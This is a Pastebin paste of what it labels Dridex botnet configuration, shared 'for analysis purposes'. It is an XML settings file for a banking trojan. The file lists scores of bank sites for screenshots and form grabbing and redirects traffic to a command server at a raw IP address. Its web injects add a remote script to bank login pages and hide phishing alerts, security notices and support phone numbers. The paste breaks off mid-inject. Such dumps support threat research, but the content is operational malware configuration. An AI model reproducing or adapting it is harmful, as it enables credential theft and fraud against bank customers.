Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Dridex botnet 200 settings for analysis purposes:
- <settings hash="8b355a535e9aab6e3812eada9769464fed8f2e08">
- <httpblock>
- <url type="allow">wex8\.suntrust\.com</url>
- <url type="allow">www7\.suntrust\.com</url>
- <url type="allow">pane\.bankofamerica\.com</url>
- <url type="allow">www\.amegybank\.com/metrics</url>
- <url type="allow">www2\.citibank\.citigroup\.com</url>
- <url type="allow">images\.citibank\.citigroup\.com</url>
- <url type="allow">www7\.compassbank\.com</url>
- <url type="allow">www\.u43\.pnc\.com</url>
- <url type="allow">cdn2\.svbconnect\.com</url>
- <url type="allow">portal\.accountonline\.com</url>
- <url type="allow">ww7\.whitneybank\.com</url>
- <url type="allow">www8\.firstcitizensonline\.com</url>
- <url type="allow">olbb2pp\.bmo\.com</url>
- <url type="allow">www2\.americafirst\.com</url>
- <url type="allow">cdn\.first\-online\.com</url>
- <url type="allow">img3\.moneygram\.com</url>
- <url type="allow">securentrycorp\.zionsbank\.com/metrics</url>
- <url type="allow">ground\.citi\.com</url>
- <url type="allow">www9\.firstcitizens\.com</url>
- <url type="allow">www7\.hwtreasurysolution\.com</url>
- <url type="allow">.*\.sessioncam\.com</url>
- <url type="allow">www\.treasury\.pncbank\.com/tmmps</url>
- <url type="allow">assets\.adobedtm\.com</url>
- <url type="allow">analytics\.pnc\.com</url>
- <url type="allow">.*\.doubleclick\.net</url>
- <url type="allow">.*\.atdmt\.com</url>
- <url type="allow">.*\.mathtag\.com</url>
- <url type="allow">.*\.rubiconproject\.com</url>
- <url type="allow">.*\.pubmatic\.com</url>
- <url type="allow">.*\.bluekai\.com</url>
- </httpblock>
- <httpshots>
- <url type="deny" onget="1" onpost="1">\.(gif|png|jpg|css|swf|ico|js)($|\?)</url>
- <url type="deny" onget="1" onpost="1">(resource\.axd|yimg\.com)</url>
- <url type="allow" onpost="1" onget="1">\.com/k1/</url>
- <url type="allow" onpost="1" onget="1">/authentication/zbf/k/</url>
- <url type="allow" onpost="1" onget="1">/bb/logon/</url>
- <url type="allow" onpost="1" onget="1">/cashman/</url>
- <url type="allow" onpost="1" onget="1">/cashplus/</url>
- <url type="allow" onpost="1" onget="1">/clkccm/</url>
- <url type="allow" onpost="1" onget="1">/cmmain\.cfm</url>
- <url type="allow" onpost="1" onget="1">/cmserver/</url>
- <url type="allow" onpost="1" onget="1">/cmwire</url>
- <url type="allow" onpost="1" onget="1">achredirect\.aspx</url>
- <url type="allow" onpost="1" onget="1">cbonline</url>
- <url type="allow" onpost="1" onget="1">/ebc_ebc1961/</url>
- <url type="allow" onpost="1" onget="1">/ibs\.</url>
- <url type="allow" onpost="1" onget="1">/loginolb/loginolb</url>
- <url type="allow" onpost="1" onget="1">/olbb/</url>
- <url type="allow" onpost="1" onget="1">/sbuser/</url>
- <url type="allow" onpost="1" onget="1">/smallbiz/</url>
- <url type="allow" onpost="1" onget="1">/wcmpw/</url>
- <url type="allow" onpost="1" onget="1">/webcm/</url>
- <url type="allow" onpost="1" onget="1">/wire/</url>
- <url type="allow" onpost="1" onget="1">/wires/</url>
- <url type="allow" onpost="1" onget="1">access\.jpmorgan\.com</url>
- <url type="allow" onpost="1" onget="1">access\.usbank\.com</url>
- <url type="allow" onpost="1" onget="1">accessbankplc\.com</url>
- <url type="allow" onpost="1" onget="1">accountoverview\.aspx</url>
- <url type="allow" onpost="1" onget="1">accurint\.com</url>
- <url type="allow" onpost="1" onget="1">achieveaccess\.citizensbank\.com</url>
- <url type="allow" onpost="1" onget="1">achpayment</url>
- <url type="allow" onpost="1" onget="1">achweb\.unionbank\.com</url>
- <url type="allow" onpost="1" onget="1">achworks\.com</url>
- <url type="allow" onpost="1" onget="1">alltimetreasury\.pacificcapitalbank\.com</url>
- <url type="allow" onpost="1" onget="1">amegybank\.com/</url>
- <url type="allow" onpost="1" onget="1">atbonlinebusiness\.com</url>
- <url type="allow" onpost="1" onget="1">auth\.umb\.com</url>
- <url type="allow" onpost="1" onget="1">authmaster\.nationalcity\.com</url>
- <url type="allow" onpost="1" onget="1">bankofbermuda\.com</url>
- <url type="allow" onpost="1" onget="1">billauth</url>
- <url type="allow" onpost="1" onget="1">billmenu</url>
- <url type="allow" onpost="1" onget="1">blilk</url>
- <url type="allow" onpost="1" onget="1">bmo\.com/</url>
- <url type="allow" onpost="1" onget="1">bmoharrisprivatebankingonline\.com</url>
- <url type="allow" onpost="1" onget="1">bmomutualfunds\.com</url>
- <url type="allow" onpost="1" onget="1">bnycash\.bankofny\.com</url>
- <url type="allow" onpost="1" onget="1">business\.macu\.com</url>
- <url type="allow" onpost="1" onget="1">business\.netbankerplus\.com</url>
- <url type="allow" onpost="1" onget="1">businessaccess\.citibank\.citigroup\.com</url>
- <url type="allow" onpost="1" onget="1">businessappshome</url>
- <url type="allow" onpost="1" onget="1">businessclassonline\.compassbank\.com</url>
- <url type="allow" onpost="1" onget="1">businesslogin</url>
- <url type="allow" onpost="1" onget="1">businessportal\.mibank\.com</url>
- <url type="allow" onpost="1" onget="1">bxs\.com</url>
- <url type="allow" onpost="1" onget="1">cashanalyzer\.com</url>
- <url type="allow" onpost="1" onget="1">cashmanager\.mizuhoe\-treasurer\.com</url>
- <url type="allow" onpost="1" onget="1">cashmgmt</url>
- <url type="allow" onpost="1" onget="1">cashmgt</url>
- <url type="allow" onpost="1" onget="1">bankofamerica\.com</url>
- <url type="allow" onpost="1" onget="1">cashproweb\.com/cpwportal</url>
- <url type="allow" onpost="1" onget="1">cbbusinessonline\.com</url>
- <url type="allow" onpost="1" onget="1">cfgbusinessaccess\.com</url>
- <url type="allow" onpost="1" onget="1">checkgateway</url>
- <url type="allow" onpost="1" onget="1">chaseonline\.chase\.com/MyAccounts\.aspx</url>
- <url type="allow" onpost="1" onget="1">cib\.bankofthewest</url>
- <url type="allow" onpost="1" onget="1">citizensbankmoneymanagergps\.com</url>
- <url type="allow" onpost="1" onget="1">cmachm\.w</url>
- <url type="allow" onpost="1" onget="1">cmbmnt\.w</url>
- <url type="allow" onpost="1" onget="1">cmol\.bbt\.com/auth</url>
- <url type="allow" onpost="1" onget="1">cmwirp\.w</url>
- <url type="allow" onpost="1" onget="1">cnbsec1\.</url>
- <url type="allow" onpost="1" onget="1">colb\.</url>
- <url type="allow" onpost="1" onget="1">commercebusinessdirect\.com</url>
- <url type="allow" onpost="1" onget="1">commercial\.wachovia\.com</url>
- <url type="allow" onpost="1" onget="1">commercialservices</url>
- <url type="allow" onpost="1" onget="1">connect\.bankcolonial\.com</url>
- <url type="allow" onpost="1" onget="1">connect\.colonialbank\.com</url>
- <url type="allow" onpost="1" onget="1">constitutioncorp\.org</url>
- <url type="allow" onpost="1" onget="1">corpach</url>
- <url type="allow" onpost="1" onget="1">corporate\.epfc\.com</url>
- <url type="allow" onpost="1" onget="1">corporateaccounts</url>
- <url type="allow" onpost="1" onget="1">corporatebankingweb</url>
- <url type="allow" onpost="1" onget="1">corporateconnect\.net</url>
- <url type="allow" onpost="1" onget="1">corpower\.coop</url>
- <url type="allow" onpost="1" onget="1">createcorpwire</url>
- <url type="allow" onpost="1" onget="1">createwire</url>
- <url type="allow" onpost="1" onget="1">ebanking\-services</url>
- <url type="allow" onpost="1" onget="1">ecash\.</url>
- <url type="allow" onpost="1" onget="1">ecm\-transfers\.unionbank\.com</url>
- <url type="allow" onpost="1" onget="1">ecms\.unionbank\.com</url>
- <url type="allow" onpost="1" onget="1">efirstbank\.com</url>
- <url type="allow" onpost="1" onget="1">enternetbank\.com</url>
- <url type="allow" onpost="1" onget="1">express\.53\.com</url>
- <url type="allow" onpost="1" onget="1">expressdeposit\.colonialbank\.com</url>
- <url type="allow" onpost="1" onget="1">fbmedirect\.com</url>
- <url type="allow" onpost="1" onget="1">ffinonline\.com</url>
- <url type="allow" onpost="1" onget="1">firstbancorp\.com</url>
- <url type="allow" onpost="1" onget="1">firstbanks\.com</url>
- <url type="allow" onpost="1" onget="1">fnfgbusinessonline\.enterprisebanker\.com</url>
- <url type="allow" onpost="1" onget="1">fxpayments\.americanexpress\.com</url>
- <url type="allow" onpost="1" onget="1">goldleaf</url>
- <url type="allow" onpost="1" onget="1">hbcash\.exe</url>
- <url type="allow" onpost="1" onget="1">hblibank\.com</url>
- <url type="allow" onpost="1" onget="1">hbproxy\.exe</url>
- <url type="allow" onpost="1" onget="1">ibbpl2\.com</url>
- <url type="allow" onpost="1" onget="1">ibbpowerlink\.com</url>
- <url type="allow" onpost="1" onget="1">ibbusinessnet\.com</url>
- <url type="allow" onpost="1" onget="1">inetbanker</url>
- <url type="allow" onpost="1" onget="1">internationalbanking\.</url>
- <url type="allow" onpost="1" onget="1">internationalpayments\.</url>
- <url type="allow" onpost="1" onget="1">internet\-ebanking\.com</url>
- <url type="allow" onpost="1" onget="1">itreasury\.amsouth\.com</url>
- <url type="allow" onpost="1" onget="1">ktt\.key\.com</url>
- <url type="allow" onpost="1" onget="1">lakelandbank\.com</url>
- <url type="allow" onpost="1" onget="1">libertymutualbusinessdirect\.com</url>
- <url type="allow" onpost="1" onget="1">lionbank\.com</url>
- <url type="allow" onpost="1" onget="1">login_business\.asp</url>
- <url type="allow" onpost="1" onget="1">logincm</url>
- <url type="allow" onpost="1" onget="1">mcb\-home\.com/online</url>
- <url type="allow" onpost="1" onget="1">memberach</url>
- <url type="allow" onpost="1" onget="1">metrobankdirect\.com</url>
- <url type="allow" onpost="1" onget="1">midatlanticcorp\.org</url>
- <url type="allow" onpost="1" onget="1">moneymanagergps\.com</url>
- <url type="allow" onpost="1" onget="1">olb\.ent\.com/business/</url>
- <url type="allow" onpost="1" onget="1">online\.1stnb\.com</url>
- <url type="allow" onpost="1" onget="1">onlineaccess1\.com</url>
- <url type="allow" onpost="1" onget="1">onlinebanking\.1stunitedbankfl\.com</url>
- <url type="allow" onpost="1" onget="1">onlinebanking\.banksterling\.com</url>
- <url type="allow" onpost="1" onget="1">onlinencr\.com</url>
- <url type="allow" onpost="1" onget="1">onlineserv/cm/</url>
- <url type="allow" onpost="1" onget="1">otm\.suntrust\.com</url>
- <url type="allow" onpost="1" onget="1">pacificenterprisebank\.com</url>
- <url type="allow" onpost="1" onget="1">passport\.texascapitalbank\.com</url>
- <url type="allow" onpost="1" onget="1">pastabanka\.lv</url>
- <url type="allow" onpost="1" onget="1">paylinks\.cunet\.org</url>
- <url type="allow" onpost="1" onget="1">payroll\.faces</url>
- <url type="allow" onpost="1" onget="1">pres_wa_wires</url>
- <url type="allow" onpost="1" onget="1">rbs_commercial</url>
- <url type="allow" onpost="1" onget="1">royalbank\.com/cgi\-bin/rbaccess</url>
- <url type="allow" onpost="1" onget="1">rsagoidauthentication</url>
- <url type="allow" onpost="1" onget="1">secure\-banking</url>
- <url type="allow" onpost="1" onget="1">secure\-eccu\.org</url>
- <url type="allow" onpost="1" onget="1">secure\-nvboh\.com/</url>
- <url type="allow" onpost="1" onget="1">secure\.1stfedbank\.com</url>
- <url type="allow" onpost="1" onget="1">secure\.ally\.com</url>
- <url type="allow" onpost="1" onget="1">secure\.bancinternetgroup\.com</url>
- <url type="allow" onpost="1" onget="1">secure\.fundsxpress\.com</url>
- <url type="allow" onpost="1" onget="1">secureport\.texascapitalbank\.com</url>
- <url type="allow" onpost="1" onget="1">server14\.cey\-ebanking\.com</url>
- <url type="allow" onpost="1" onget="1">singlepoint\.usbank\.com</url>
- <url type="allow" onpost="1" onget="1">suntrust\.omniasp\.com</url>
- <url type="allow" onpost="1" onget="1">svbconnect</url>
- <url type="allow" onpost="1" onget="1">swifttransfer</url>
- <url type="allow" onpost="1" onget="1">tabbank\.com</url>
- <url type="allow" onpost="1" onget="1">tdcommercialbanking</url>
- <url type="allow" onpost="1" onget="1">treas\-mgt\.frostbank\.com</url>
- <url type="allow" onpost="1" onget="1">treasury\.pncbank\.com</url>
- <url type="allow" onpost="1" onget="1">treasury\.wamu\.com</url>
- <url type="allow" onpost="1" onget="1">treasurydirect\.tdbank\.com</url>
- <url type="allow" onpost="1" onget="1">treasurylinkweb\.com</url>
- <url type="allow" onpost="1" onget="1">treasurypathways\.com</url>
- <url type="allow" onpost="1" onget="1">treasuryservices\.banknow\.texascapitalbank\.com</url>
- <url type="allow" onpost="1" onget="1">trz\.tranzact\.org</url>
- <url type="allow" onpost="1" onget="1">usgateway2\.rbs\.com</url>
- <url type="allow" onpost="1" onget="1">^https.+usaa\.com</url>
- <url type="allow" onpost="1" onget="1">wblnk\.</url>
- <url type="allow" onpost="1" onget="1">wcma\.businesscenter\.ml\.com/bcprivate/asp/wcmaloginea\.aspx</url>
- <url type="allow" onpost="1" onget="1">wcmfd/wcmpw</url>
- <url type="allow" onpost="1" onget="1">web\-access</url>
- <url type="allow" onpost="1" onget="1">web\.accessor\.com</url>
- <url type="allow" onpost="1" onget="1">webbankingforbusiness\.mandtbank\.com</url>
- <url type="allow" onpost="1" onget="1">webcash</url>
- <url type="allow" onpost="1" onget="1">webcashmgmt\.com</url>
- <url type="allow" onpost="1" onget="1">webexpress</url>
- <url type="allow" onpost="1" onget="1">weblink\.websterbank\.com</url>
- <url type="allow" onpost="1" onget="1">wiretransfer</url>
- <url type="allow" onpost="1" onget="1">^https.+schwab\.com</url>
- <url type="allow" onpost="1" onget="1">^https.+key\.com</url>
- <url type="allow" onpost="1" onget="1">^https.+vanguard\.com</url>
- <url type="allow" onpost="1" onget="1">^https.+etrade\.com</url>
- <url type="allow" onpost="1" onget="1">^https.+pnc\.com</url>
- </httpshots>
- <formgrabber>
- <url type="deny">\.(swf)($|\?)</url>
- <url type="deny">/isapi/ocget.dll</url>
- <url type="allow">^https?://aol.com/.*/login/</url>
- <url type="allow">^https?://accounts.google.com/ServiceLogin</url>
- <url type="allow">^https?://login.yahoo.com/</url>
- <url type="allow">^https?://login.live.com/</url>
- <url type="deny">^https?://(\w+\.)?aol.com</url>
- <url type="deny">^https?://(\w+\.)?facebook.com/</url>
- <url type="deny">^https?://(\w+\.)?google</url>
- <url type="deny">^https?://(\w+\.)?yahoo</url>
- <url type="deny">^https?://(\w+\.)?youtube.com</url>
- <url type="deny">^https?://(\w+\.)?live.com</url>
- <url type="deny">^https?://(\w+\.)?twitter.com</url>
- <url type="deny">^https?://(\w+\.)?vk.com</url>
- <url type="deny">^https.*ocsp\..+$</url>
- <url type="deny">^https.*safebrowsing\..+$</url>
- <url type="deny">^https?://fhr\.data\.mozilla\.com</url>
- <url type="deny">^https://s.*\.symcd\.com</url>
- <url type="deny">^https://s.*\.symcb\.com</url>
- <url type="deny">^https.*ocsp2\..+$</url>
- <url type="deny">^https://localhost.+skypectoc/.+$</url>
- <url type="deny">\.messenger\.live\.com</url>
- <url type="deny">pipe\.skype\.com</url>
- <url type="deny">\.lphbs\.com</url>
- <url type="deny">ocsp\.digicert\.com</url>
- <url type="deny">txtsrving\.info</url>
- <url type="deny">zynga\.com</url>
- <url type="deny">yahoo\.com</url>
- <url type="deny">pnrws\.skype\.com</url>
- <url type="deny">netflix\.com</url>
- <url type="deny">bluecava\.com</url>
- <url type="deny">liverail\.com </url>
- <url type="deny">bing\.com</url>
- <url type="deny">\.optimatic\.com</url>
- <url type="deny">hiro\.tv</url>
- <url type="deny">spotxchange\.com</url>
- <url type="deny">nielsen\.com</url>
- <url type="deny">mapquest\.com </url>
- <url type="deny">^https://.+\.skype\.com/api/</url>
- <url type="deny">(//|\.)lphbs.com</url>
- <url type="deny">(//|\.)zynga.com</url>
- </formgrabber>
- <redirects>
- <redirect name="1st" vnc="0" socks="0" uri="http://94.23.60.119:8080/staticstat" timeout="20">statsgatherr.js</redirect>
- <redirect name="2nd" vnc="1" socks="1" uri="http://94.23.60.119:8080/tickerlive" timeout="20">statticker2.js</redirect>
- </redirects>
- <httpinjects>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://eadibcorp\.adib\.ae/cb/servlet/cb/jsp\-ns/login\.jsp</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA["><p align="justify"]]></pattern>
- <replacement><![CDATA[display:none;"><p align="justify"]]></replacement>
- </modify>
- <modify>
- <pattern modifiers="i"><![CDATA[Customer Service: <span dir="ltr">.*</span>]]></pattern>
- <replacement><![CDATA[]]></replacement>
- </modify>
- <modify>
- <pattern modifiers="i"><![CDATA[(td valign="middle" class="columndata" style="padding-left:30px;)]]></pattern>
- <replacement><![CDATA[\1display:none;]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://eadibcorp\.adib\.ae/cb/servlet/cb/jsp\-ns/login2\.jsp</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
- <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://fiepay\.mashreqbank\.com/Login\.asp</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- <modify>
- <pattern modifiers="i"><![CDATA[(href="SecurityAlert\.htm")]]></pattern>
- <replacement><![CDATA[\1 style="display:none;"]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://banking\.mashreqbank\.com/FID/login\.aspx</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
- <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
- </modify>
- <modify>
- <pattern modifiers="i"><![CDATA[(id="ContactTable")]]></pattern>
- <replacement><![CDATA[\1 style="display:none;"]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://netbanking\.mashreqbank\.com/EntlWeb/IbsJsps/orbilogin\.jsp</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://netbanking\.mashreqbank\.com/B001/SMELogin\.jsp</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- <modify>
- <pattern modifiers="i"><![CDATA[<span class="text-1"><i class="icon-ok"></i> Need assistance call <span>.*</span></span>]]></pattern>
- <replacement><![CDATA[]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://rakbankonline\.ae/corp/BANKAWAY(;|\?|$)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- <modify>
- <pattern modifiers="i"><![CDATA[( class="trouble")]]></pattern>
- <replacement><![CDATA[\1 style="display:none;"]]></replacement>
- </modify>
- <modify>
- <pattern modifiers="i"><![CDATA[( class="disclaimer")]]></pattern>
- <replacement><![CDATA[\1 style="display:none;"]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="">^https://bnycash\.bankofny\.com/$</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="Ui"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://cmol\.bbt\.com/auth/prompt\.tb</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- <modify>
- <pattern modifiers="Ums"><![CDATA[<strong>Security</strong>.*<p class="errortext">(?<inject>.*)</p>]]></pattern>
- <replacement />
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="">^https://www\d*\.bmo\.com/ctpauth/CTPEAILogin/CustUserPasswordAuthServlet($|\?)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://w\d+\.businessbanking\.cibc\.com/logon\.jsp($|\?|\;)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\d*.royalbank.com/cgi-bin/rbaccess/(rbcgi|rbunxcgi\?.+=ClientSignin)</url>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://easywebcpo\.td\.com/waw/idp/login\.htm</url>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.cibconline\.cibc\.com/olbtxn/authentication/.+\.cibc($|\?.*)</url>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\d*\.bmo\.com/cgi\-bin/netbnx/NBmain($|\?)</url>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.bmomutualfunds\.com/(|cfm/Holdings)$</url>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://www\d*\.bmoharrisprivatebankingonline\.com/Client/DFSignIn/DFLogin\.aspx($|\?)</url>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://[1-9a-z\.\-]+\.web\-access\.com/.*(login|welcome|auth).*\.cgi</url>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://webinfocus\.mandtbank\.com/mandt/cgi\-bin/.*(login|welcome|auth).*\.cgi</url>
- <url type="allow" onpost="1" onget="1" modifiers="">^https://towernet\.capitalonebank\.com/.*login.*\.(cgi|html)</url>
- <url type="allow" onpost="1" onget="1" modifiers="i">^https://webbankingforbusiness\.mandtbank\.com/(|SBBSignOn\.aspx)(\?|$)</url>
- <url type="allow" onpost="1" onget="1" modifiers="">^https://banking\.calbanktrust\.com/iLogin\.jsp(\?|$)</url>
- <url type="allow" onpost="1" onget="1" modifiers="i">^https://onlinebanking\.banksterling\.com/login2.asp(\?|$)</url>
- <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.enternetbank\.com/TESrvAuth\?.*laf=exact4web</url>
- <url type="allow" onpost="1" onget="1" modifiers="">^https://(www\.|)ibbpowerlink\.com/fotrd/login\.jsp(\?|$)</url>
- <url type="allow" onpost="1" onget="1" modifiers="i">^https://bolb\-(west|east)\.associatedbank\.com/(|Security/Password\.aspx)(\?|$)</url>
- <url type="allow" onpost="1" onget="1" modifiers="">^https://vpn\d*\.sandyspringbank\.com/\+CSCOE\+/logon\.html(\?|$)</url>
- <url type="allow" onpost="1" onget="1" modifiers="i">^https://(www\.|)mbachexpress\.com/Inductor/Login\.aspx(\?|$)</url>
- <url type="allow" onpost="1" onget="1" modifiers="i">^https://ifxmanager\.bnymellon\.com/pw/pwserv/smpwservicescgi\.exe\?</url>
- <url type="allow" onpost="1" onget="1" modifiers="i">^https://www\.nashvillecitizensbank\.com/olbb/(|login\.asp)(\?|$)</url>
- <url type="allow" onpost="1" onget="1" modifiers="i">^https://cbs\.firstcitizens\.com/cb/servlet/cb/loginfcbnc\.jsp(\?|$)</url>
- <url type="allow" onpost="1" onget="1" modifiers="">^https://achieveaccess\.citizensbank\.com/exchange/(\?|$)</url>
- <url type="allow" onpost="1" onget="1" modifiers="i">^https://.+/Common/SignOn/Start\.asp$</url>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://(www\.|)scotiaonline\.scotiabank\.com/online/start\.jsp(\?|$)</url>
- <url type="allow" onpost="1" onget="1" modifiers="">^https://banking\.firsttennessee\.biz/servlet/ftb/index.html(\?|$)</url>
- <url type="allow" onpost="1" onget="1" modifiers="">^https://businessclassonline\.compassbank\.com/fi\d+\_Banking/bb/logon(\?|$)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</(head|HEAD) *>)]]></pattern>
- <replacement><![CDATA[<link rel="stylesheet" href="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.11/themes/hot-sneaks/jquery-ui.css" type="text/css"/>\1]]></replacement>
- </modify>
- <modify>
- <pattern modifiers="ms"><![CDATA[(.*)(</(form|FORM|body|BODY) *?>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\2]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="">^https://cbs\.fidelitybanknc\.com/cb/servlet/cb/loginfcbnc\.jsp(\?|$)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://treas\-mgt\.frostbank\.com/rdp/cgi\-bin/[a-zA-z]+\.cgi</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="imsU"><![CDATA[(name="login\_form".+</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.hsbc\.ca/1/2/</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
- <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="">^https://secure\.rabobank\.com/Gateway/offlineloginpage\.html(\?|$)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</FORM>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.citibusiness\.citibank\.com\.sg/SGCBZ/JSO/signon/DisplayCinSignon\.do(\?|$)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="sA"><![CDATA[(.+</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- <modify>
- <pattern modifiers="sA"><![CDATA[.+(?<inject><b>PHISHING ALERT</b>.+?</font>.+?)</font>]]></pattern>
- <replacement />
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="">^https://usgateway\d*\.rbs\.com/wps/portal/cb/applications.*MoneyManagerGps</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="i">^https://(www\.|)securenetbanking\.ca/(IBClient/loginCorp|IBRetail/loginbusiness)\.aspx(\?|$)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="">^https://clientlogin\.ibb\.ubs\.com/login(\?|$)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="Ui"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://.*/fi\d+/bb/logon</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="imsU"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://bbo\.1stsource\.com/login\.cfm</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
